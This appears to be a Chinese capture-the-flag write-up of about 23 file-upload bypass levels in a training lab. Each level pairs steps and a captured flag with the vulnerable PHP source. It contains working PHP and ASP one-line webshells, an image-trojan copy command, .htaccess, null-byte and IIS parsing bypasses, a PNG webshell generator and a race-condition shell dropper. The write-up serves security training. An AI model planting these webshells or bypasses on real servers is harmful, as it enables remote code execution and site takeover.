文章目录
文件上传要点
- 成因:没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。
- 分类:- 客户端检测:一般是在网页上写一段Js脚本,用Js去检测,校验上传文件的后缀名,有白名单也有黑名单。判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包,所以可以通过抓包来 判断,如果弹出不准上传,但是没有抓到数据包,那么就是前端验证前端验证非常不可靠,传正常文件改数据包就可以绕过,甚至关闭JS都可以尝试绕过- 服务端检测 常见的手段: 检查Content-Type (内容类型) 检查后缀 (检查后缀是主流) 检查文件头
- asp是一句话木马:
<%eval request("asp")%>
- php一句话木马:
<?php eval($_REQUEST[1]);?>
- 图片马制作:cmd
copy 1.jpg/b + 1.php/a 2.jpg
- 防御:- 防护怎么加?(文件上传默认代码是没有防护的。)客户端检测:浏览器(JS) => 没有检测 服务端检测:目标主机(后端代码)- 黑名单:不允许某某白名单:只允许某某- 防御方式: 后缀检测(最常见检测方式) 根据后缀来决定用什么东西处理这个文件 Content-Type: .php => phtml php3 php4 php5 .htaccess => 分布式配置文件 windows 的文件和文件夹都不分大小写的 windows 会自动去后缀末尾的空格 windows 会自动去后缀末尾的点 .php .php空格 => 末尾的空格会处理
1、前端验证绕过
文件名后缀设为php,文件类型设为图片类型
做题步骤
先上传一个php文件和正常的图片文件看一下回显
正确回显:
上传php文件回显:
弹窗提示,只能上传.jpg|.png|.gif类型的文件
构造图片马:
<?php eval($_POST[1]); ?>
抓包修改文件名后缀为php
上传后右键新建标签页打开图像
可以看到文件路径,然后测试是否上传成功
连接蚁剑
拿到flag:
zkaq{PpsG@-cImaU2cahL}
源码分析
functioncheckFile(){var file = document.getElementsByName('upload_file')[0].value;//当文件为空时,提示选择文件if(file ==null|| file ==""){alert("请选择要上传的文件!");returnfalse;}//定义允许上传的文件类型var allow_ext =".jpg|.png|.gif";//提取上传文件的类型//截取到文件后缀名var ext_name = file.substring(file.lastIndexOf("."));//判断上传文件类型是否允许上传if(allow_ext.indexOf(ext_name +"|")==-1){var errMsg ="该文件不允许上传,请上传"+ allow_ext +"类型的文件,当前文件类型为:"+ ext_name;alert(errMsg);returnfalse;}}
getElementsBy()
方法可以返回指定名称的对象的集合。
substring(起始索引,结束索引)
返回字符串的子字符串。
lastIndexOf()
方法可返回一个指定的字符串值最后出现的位置,在一个字符串中的指定位置从后向前搜索。
2、Content-Type方式绕过
做题步骤
拿到flag:
zkaq{2jzVjQeRV_EfuA-+}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){if(($_FILES['upload_file']['type']=='image/jpeg')||($_FILES['upload_file']['type']=='image/png')||($_FILES['upload_file']['type']=='image/gif')){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR. $_FILES['upload_file']['name'];
$is_upload =true;}}else{
$msg ='文件类型不正确,请重新上传!';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')
:说明上传的文件类型必须是jpeg、pbg、gif,就是数据包中的Content-Type
3、黑名单绕过
在过滤php,asp等后缀名时,可修改文件后缀名为
phtml、php3、php4、php5
进行绕过
做题步骤
按照前几关的步骤,上传gif图片马然后修改后缀名为PHP,有以下提示
不允许上传.asp,.aspx,.php,.jsp后缀文件!
尝试绕过,修改文件后缀名为
phtml、php3、php4、php5
判断是否上传成功
蚁剑连接
拿到flag:
zkaq{lapc=@Hs1EXxqwif}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array('.asp','.aspx','.php','.jsp');
$file_name =trim($_FILES['upload_file']['name']);
$file_name =deldot($file_name);//删除文件名末尾的点
$file_ext =strrchr($file_name,'.');
$file_ext =strtolower($file_ext);//转换为小写
$file_ext =str_ireplace('::$DATA','', $file_ext);//去除字符串::$DATA
$file_ext =trim($file_ext);//收尾去空if(!in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'];
$is_upload =true;}}else{
$msg ='不允许上传.asp,.aspx,.php,.jsp后缀文件!';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
4、.htaccess文件绕过
简介
在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有禁用
.htaccee
那么就能触发
getshell
.htaccess可以把.jpg解析成php
:
AddType application/x-httpd-php .jpg
做题步骤
先上传.htaccess文件:
AddType application/x-httpd-php .gif
然后上传gif图片马
测试是否上传成功
蚁剑连接
拿到flag:
zkaq{lgevqWqnexX2hy-a}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name =trim($_FILES['upload_file']['name']);
$file_name =deldot($file_name);//删除文件名末尾的点
$file_ext =strrchr($file_name,'.');
$file_ext =strtolower($file_ext);//转换为小写
$file_ext =str_ireplace('::$DATA','', $file_ext);//去除字符串::$DATA
$file_ext =trim($file_ext);//收尾去空if(!in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR. $_FILES['upload_file']['name'];
$is_upload =true;}}else{
$msg ='此文件不允许上传!';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
代码把很多文件类型都过滤掉了
5、后缀大小写绕过
简介
strtolower($file_ext)
:函数会将所有字母转换为小写,在没有此功能,且很多后缀被ban的情况下,可以使用大小写绕过
做题步骤
上传gif图片马
抓包,修改后缀为Php
测试是否上传成功
连接蚁剑
拿到flag:
zkaq{HBkYvhSTYnXLkY@1}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name =trim($_FILES['upload_file']['name']);
$file_name =deldot($file_name);//删除文件名末尾的点
$file_ext =strrchr($file_name,'.');
$file_ext =str_ireplace('::$DATA','', $file_ext);//去除字符串::$DATA
$file_ext =trim($file_ext);//首尾去空if(!in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR.'/'. $file_name;
$is_upload =true;}}else{
$msg ='此文件不允许上传';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
这个题把几乎用得到的后缀名都过滤了,包括上一关利用的.htaccess文件,但是没有使用转换小写字母的函数,所以可以绕过
6、文件后缀(空)绕过
简介
trim($file_ext)
:该函数将字符串收尾去空,
在大小写绕不过,且没有使用此函数时,可使用后缀空绕过
做题步骤
上传gif图片马
抓包在后缀加个空格上传
测试是否上传成功
连接蚁剑
拿到flag:
zkaq{fTHte#S@+5n1B+UF}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name =deldot($file_name);//删除文件名末尾的点
$file_ext =strrchr($file_name,'.');
$file_ext =strtolower($file_ext);//转换为小写
$file_ext =str_ireplace('::$DATA','', $file_ext);//去除字符串::$DATAif(!in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR.'/'. $file_name;
$is_upload =true;}}else{
$msg ='此文件不允许上传';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
$file_ext = strtolower($file_ext);
这行代码过滤了大小写
7、文件后缀(点)绕过
简介
deldot($file_name)
此函数删除了文件名末尾的点
做题步骤
上传gif图片马
抓包在后缀加几个点上传
拿到flag:zkaq{2hd2JY3@F7VNMY8W}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name =trim($_FILES['upload_file']['name']);
$file_ext =strrchr($file_name,'.');
$file_ext =strtolower($file_ext);//转换为小写
$file_ext =str_ireplace('::$DATA','', $file_ext);//去除字符串::$DATA
$file_ext =trim($file_ext);//首尾去空if(!in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR.'/'. $file_name;
$is_upload =true;}}else{
$msg ='此文件不允许上传';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
$file_ext = trim($file_ext); //首尾去空
:此行代码过滤了空格
8、::$DATA(Windows文件流绕过)
简介
str_ireplace('::$DATA', '', $file_ext);
:去除字符串
::$DATA
做题步骤
回显404
删除
::$DATA
蚁剑连接
拿到flag:
zkaq{n5zP@kZia7%dSPP1}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name =trim($_FILES['upload_file']['name']);
$file_name =deldot($file_name);//删除文件名末尾的点
$file_ext =strrchr($file_name,'.');
$file_ext =strtolower($file_ext);//转换为小写
$file_ext =trim($file_ext);//首尾去空if(!in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR.'/'. $file_name;
$is_upload =true;}}else{
$msg ='此文件不允许上传';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
这两行代码过滤了点
但是少掉了过滤
字符串::$DATA
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
9、构造文件后缀绕过
做题步骤
抓包修改后缀为
php. . .
连接蚁剑
拿到flag:
zkaq{1+U=Tl=%AKS-juZ5}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name =trim($_FILES['upload_file']['name']);
$file_name =deldot($file_name);//删除文件名末尾的点
$file_ext =strrchr($file_name,'.');
$file_ext =strtolower($file_ext);//转换为小写
$file_ext =str_ireplace('::$DATA','', $file_ext);//去除字符串::$DATA
$file_ext =trim($file_ext);//首尾去空if(!in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR.'/'. $file_name;
$is_upload =true;}}else{
$msg ='此文件不允许上传';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
可以构造后缀有多个空格和点来绕过
10、双写文件后缀绕过
做题步骤
抓包修改后缀名为
pphphp
蚁剑连接
拿到flag:
zkaq{7aYaRs8IN+9pP=rx}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array("php","php5","php4","php3","php2","html","htm","phtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name =trim($_FILES['upload_file']['name']);
$file_name =str_ireplace($deny_ext,"", $file_name);if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $file_name)){
$img_path = $UPLOAD_ADDR.'/'.$file_name;
$is_upload =true;}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
$file_name = str_ireplace($deny_ext,"", $file_name);
:此行代码表示当匹配到以上文件后缀时,用空格代替
11、%00截断绕过
简介
在url中%00表示ascll码中的0 ,0x00是十六进制表示方法,也是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
做题步骤
抓包修改文件后缀,
.php%00.gif
,修改参数
save_path=../upload/1.php%00
蚁剑连接
拿到flag:
zkaq{E9JvKGkwMNLDpZRm}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){
$ext_arr =array('jpg','png','gif');
$file_ext =substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){
$is_upload =true;}else{
$msg ='上传失败!';}}else{
$msg ="只允许上传.jpg|.png|.gif类型文件!";}}
substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1)
检测后缀时被截断
12、%00截断绕过(二)
做题步骤
与第十一关不同的地方是,本关是post传参
抓包八宝村路径改成
1.phpa
然后徐修改hex值,把a对应的地方修改为00
连接蚁剑
拿到flag:
zkaq{hx5JQH@+OkI_5Fiv}
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){
$ext_arr =array('jpg','png','gif');
$file_ext =substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){
$is_upload =true;}else{
$msg ="上传失败";}}else{
$msg ="只允许上传.jpg|.png|.gif类型文件!";}}
13-15、图片马绕过
做题步骤
jpg图片马制作过程:
抓包改后缀名为php
png图片马制作:
gif文件也类似
源码分析
functiongetReailFileType($filename){
$file =fopen($filename,"rb");
$bin =fread($file,2);//只读2字节fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode =intval($strInfo['chars1'].$strInfo['chars2']);
$fileType ='';switch($typeCode){case255216:
$fileType ='jpg';break;case13780:
$fileType ='png';break;case7173:
$fileType ='gif';break;default:
$fileType ='unknown';}return $fileType;}
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type =getReailFileType($temp_file);if($file_type =='unknown'){
$msg ="文件未知,上传失败!";}else{
$img_path = $UPLOAD_ADDR."/".rand(10,99).date("YmdHis").".".$file_type;if(move_uploaded_file($temp_file,$img_path)){
$is_upload =true;}else{
$msg ="上传失败";}}}
与第十四关、getimagesize图片类型绕过和第十五关、php_exif模块图片类型绕过步骤一样
16、二次渲染绕过
简介
原理:将一个正常显示的图片,上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分,将Webshell代码插在该部分,然后上传。具体实现需要自己编写Python程序,人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。
png:
<?php
$p = array(0xa3,0x9f,0x67,0xf7,0x0e,0x93,0x1b,0x23,0xbe,0x2c,0x8a,0xd0,0x80,0xf9,0xe1,0xae,0x22,0xf6,0xd9,0x43,0x5d,0xfb,0xae,0xcc,0x5a,0x01,0xdc,0x5a,0x01,0xdc,0xa3,0x9f,0x67,0xa5,0xbe,0x5f,0x76,0x74,0x5a,0x4c,0xa1,0x3f,0x7a,0xbf,0x30,0x6b,0x88,0x2d,0x60,0x65,0x7d,0x52,0x9d,0xad,0x88,0xa1,0x66,0x44,0x50,0x33);
$img = imagecreatetruecolor(32,32);for($y =0; $y < sizeof($p); $y +=3){
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img,round($y /3),0, $color);}
imagepng($img,'./1.png');
?>
使用gif格式的图片,一般hex前面首部部分不会改变,所以将一句话木马直接插入到没有改变的这部分
做题步骤
制作gif图片马
上传图片,下载下来后木马被删除,对比原来的图片马,在没有变化的位置添加一句话木马
继续上传,上传成功
连接蚁剑
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=$UPLOAD_ADDR.basename($filename);// 获得上传文件的扩展名
$fileext=substr(strrchr($filename,"."),1);//判断文件后缀与类型,合法才进行上传操作if(($fileext =="jpg")&&($filetype=="image/jpeg")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片
$im =imagecreatefromjpeg($target_path);if($im ==false){
$msg ="该文件不是jpg格式的图片!";}else{//给新图片指定文件名srand(time());
$newfilename =strval(rand()).".jpg";
$newimagepath = $UPLOAD_ADDR.$newfilename;imagejpeg($im,$newimagepath);//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = $UPLOAD_ADDR.$newfilename;unlink($target_path);
$is_upload =true;}}else{
$msg ="上传失败!";}}elseif(($fileext =="png")&&($filetype=="image/png")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片
$im =imagecreatefrompng($target_path);if($im ==false){
$msg ="该文件不是png格式的图片!";}else{//给新图片指定文件名srand(time());
$newfilename =strval(rand()).".png";
$newimagepath = $UPLOAD_ADDR.$newfilename;imagepng($im,$newimagepath);//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = $UPLOAD_ADDR.$newfilename;unlink($target_path);
$is_upload =true;}}else{
$msg ="上传失败!";}}elseif(($fileext =="gif")&&($filetype=="image/gif")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片
$im =imagecreatefromgif($target_path);if($im ==false){
$msg ="该文件不是gif格式的图片!";}else{//给新图片指定文件名srand(time());
$newfilename =strval(rand()).".gif";
$newimagepath = $UPLOAD_ADDR.$newfilename;imagegif($im,$newimagepath);//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = $UPLOAD_ADDR.$newfilename;unlink($target_path);
$is_upload =true;}}else{
$msg ="上传失败!";}}else{
$msg ="只允许上传后缀为.jpg|.png|.gif的图片文件!";}}
$im = imagecreatefrompng($target_path);
:会使用上传的图片生成新的图片,此时会删除最后末尾的一句话木马
17-18、条件竞争绕过
简介
不断地上传文件和不断地访问自己上传的文件,很有可能在文件进行判断删除之前,成功访问文件,并执行里面的代码
做题步骤
上传shell
<?php$f=fopen("shell.php","w");fputs($f,'<?php phpinfo(); ?>');?>
抓包使用intruder模块,不断上传文件
使用以下脚本访问shell.php文件
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){
$ext_arr =array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext =substr($file_name,strrpos($file_name,".")+1);
$upload_file = $UPLOAD_ADDR.'/'. $file_name;if(move_uploaded_file($temp_file, $upload_file)){if(in_array($file_ext,$ext_arr)){
$img_path = $UPLOAD_ADDR.'/'.rand(10,99).date("YmdHis").".".$file_ext;rename($upload_file, $img_path);
$is_upload =true;}else{
$msg ="只允许上传.jpg|.png|.gif类型文件!";unlink($upload_file);}}else{
$msg ='上传失败!';}}
只允许上传.jpg|.png|.gif类型文件
strrpos($file_name,".")
:寻找点最后一次出现的时间
$file_ext = substr($file_name,strrpos($file_name,".")+1);
:输出后缀名
if(move_uploaded_file($temp_file, $upload_file)){ if(in_array($file_ext,$ext_arr)){
这里先把文件移到到upload文件夹,再进行判断后缀名,如果后缀名不对就删除文件。
第十八关与第十七关一样
//index.php
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){require_once("./myupload.php");
$imgFileName =time();
$u =newMyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
$status_code = $u->upload($UPLOAD_ADDR);switch($status_code){case1:
$is_upload =true;
$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;break;case2:
$msg ='文件已经被上传,但没有重命名。';break;case-1:
$msg ='这个文件不能上传到服务器的临时文件存储目录。';break;case-2:
$msg ='上传失败,上传目录不可写。';break;case-3:
$msg ='上传失败,无法上传该类型文件。';break;case-4:
$msg ='上传失败,上传的文件过大。';break;case-5:
$msg ='上传失败,服务器已经存在相同名称文件。';break;case-6:
$msg ='文件无法上传,文件不能复制到目标目录。';break;default:
$msg ='未知错误!';break;}}//myupload.phpclassMyUpload{..................var $cls_arr_ext_accepted =array(".doc",".xls",".txt",".pdf",".gif",".jpg",".zip",".rar",".7z",".ppt",".html",".xml",".tiff",".jpeg",".png");................../** upload()
**
** Method to upload the file.
** This is the only method to call outside the class.
** @para String name of directory we upload to
** @returns void
**/functionupload($dir){
$ret = $this->isUploadedFile();if( $ret !=1){return $this->resultUpload( $ret );}
$ret = $this->setDir( $dir );if( $ret !=1){return $this->resultUpload( $ret );}
$ret = $this->checkExtension();if( $ret !=1){return $this->resultUpload( $ret );}
$ret = $this->checkSize();if( $ret !=1){return $this->resultUpload( $ret );}// if flag to check if the file exists is set to 1if( $this->cls_file_exists ==1){
$ret = $this->checkFileExists();if( $ret !=1){return $this->resultUpload( $ret );}}// if we are here, we are ready to move the file to destination
$ret = $this->move();if( $ret !=1){return $this->resultUpload( $ret );}// check if we need to rename the fileif( $this->cls_rename_file ==1){
$ret = $this->renameFile();if( $ret !=1){return $this->resultUpload( $ret );}}// if we are here, everything worked as planned :)return $this->resultUpload("SUCCESS");}..................};
19、move_uploaded_file()截断
做题步骤
抓包修改文件名
hex00截断
打开图片链接
修改url路径
注入成功
连接蚁剑
源码分析
$is_upload =false;
$msg =null;if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$deny_ext =array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext =pathinfo($file_name,PATHINFO_EXTENSION);if(!in_array($file_ext,$deny_ext)){
$img_path = $UPLOAD_ADDR.'/'.$file_name;if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)){
$is_upload =true;}else{
$msg ='上传失败!';}}else{
$msg ='禁止保存为该类型文件!';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
:输出后缀
move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)
:函数把上传的文件
F
I
L
E
S
移动到新位置
_FILES移动到新位置
FILES移动到新位置img_path。
20、IIS6.0解析漏洞(一)
做题步骤
抓包,改文件后缀
返回文件位置:
源码分析
$allowedExts =array("gif","jpeg","jpg","png","asa","cer","cdx");
$temp =explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension =end($temp);// 获取文件后缀名if((($_FILES["file"]["type"]=="image/gif")||($_FILES["file"]["type"]=="image/jpeg")||($_FILES["file"]["type"]=="image/jpg")||($_FILES["file"]["type"]=="image/pjpeg")||($_FILES["file"]["type"]=="image/x-png")||($_FILES["file"]["type"]=="image/png"))&&($_FILES["file"]["size"]<204800)// 小于 200 kb&&in_array($extension, $allowedExts)){if($_FILES["file"]["error"]>0){
echo "错误:: ". $_FILES["file"]["error"]."";}else{
echo "上传文件名: ". $_FILES["file"]["name"]."";
echo "文件类型: ". $_FILES["file"]["type"]."";
echo "文件大小: ".($_FILES["file"]["size"]/1024)." kB";if(file_exists("./a/image/". $_FILES["file"]["name"])){
echo $_FILES["file"]["name"]." 文件已经存在。 ";}else{// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret =move_uploaded_file($_FILES["file"]["tmp_name"],"image/". $_FILES["file"]["name"]);
echo "文件存储在: "."./a/image/". $_FILES["file"]["name"];}}}else{
echo "非法的文件格式";}
21、IIS6.0解析漏洞(二)
文件名漏洞:触发漏洞的命名方式:as.asp;.jpg
做题步骤
抓包修改后缀为
.asp;.png
进行截断
源码分析
$allowedExts =array("gif","jpeg","jpg","png");
$temp =explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension =end($temp);// 获取文件后缀名if((($_FILES["file"]["type"]=="image/gif")||($_FILES["file"]["type"]=="image/jpeg")||($_FILES["file"]["type"]=="image/jpg")||($_FILES["file"]["type"]=="image/pjpeg")||($_FILES["file"]["type"]=="image/x-png")||($_FILES["file"]["type"]=="image/png"))&&($_FILES["file"]["size"]<204800)// 小于 200 kb&&in_array($extension, $allowedExts)){if($_FILES["file"]["error"]>0){
echo "错误:: ". $_FILES["file"]["error"]."";}else{
echo "上传文件名: ". $_FILES["file"]["name"]."";
echo "文件类型: ". $_FILES["file"]["type"]."";
echo "文件大小: ".($_FILES["file"]["size"]/1024)." kB";if(file_exists("./b/image/". $_FILES["file"]["name"])){
echo $_FILES["file"]["name"]." 文件已经存在。 ";}else{// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret =move_uploaded_file($_FILES["file"]["tmp_name"],"image/". $_FILES["file"]["name"]);
echo "文件存储在: "."./b/image/". $_FILES["file"]["name"];
echo "";}}}else{
echo "非法的文件格式";}
22、IIS6.0解析漏洞(三)
文件夹名漏洞:触发漏洞的命名方式:as.asp;.jpg
做题步骤
抓包修改文件名为:
/muma.asp/asp.jpg
或者修改为
muma.asp;.png
源码分析
$allowedExts =array("jpg");
$time =time();
$temp =explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension =end($temp);// 获取文件后缀名if((($_FILES["file"]["type"]=="image/gif")||($_FILES["file"]["type"]=="image/jpeg")||($_FILES["file"]["type"]=="image/jpg")||($_FILES["file"]["type"]=="image/pjpeg")||($_FILES["file"]["type"]=="image/x-png")||($_FILES["file"]["type"]=="image/png"))&&($_FILES["file"]["size"]<204800)// 小于 200 kb&&in_array($extension, $allowedExts)){if($_FILES["file"]["error"]>0){
echo "错误:: ". $_FILES["file"]["error"]."";}else{
echo "上传文件名: ". $_FILES["file"]["name"]."";
echo "文件类型: ". $_FILES["file"]["type"]."";
echo "文件大小: ".($_FILES["file"]["size"]/1024)." kB";if(file_exists("C:/Inetpub/wwwroot/c/image/a.asp/".$time.".jpg")){
echo $_FILES["file"]["name"]." 文件已经存在。 ";}else{// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret =move_uploaded_file($_FILES["file"]["tmp_name"],"image/a.asp/".$time.".jpg");
echo "文件存储在: "."./c/image/a.asp/".$time.".jpg";
echo "";}}}else{
echo "非法的文件格式";}
$allowedExts = array("jpg");
:只允许上传jpg文件
$extension = end($temp);
: 获取文件后缀名,使用
/
截断
23、CGI解析漏洞
触发解析漏洞的命名:a.jpg/.php
做题步骤
直接上传图片马
访问时加上
/.php
,让他以php形式解析
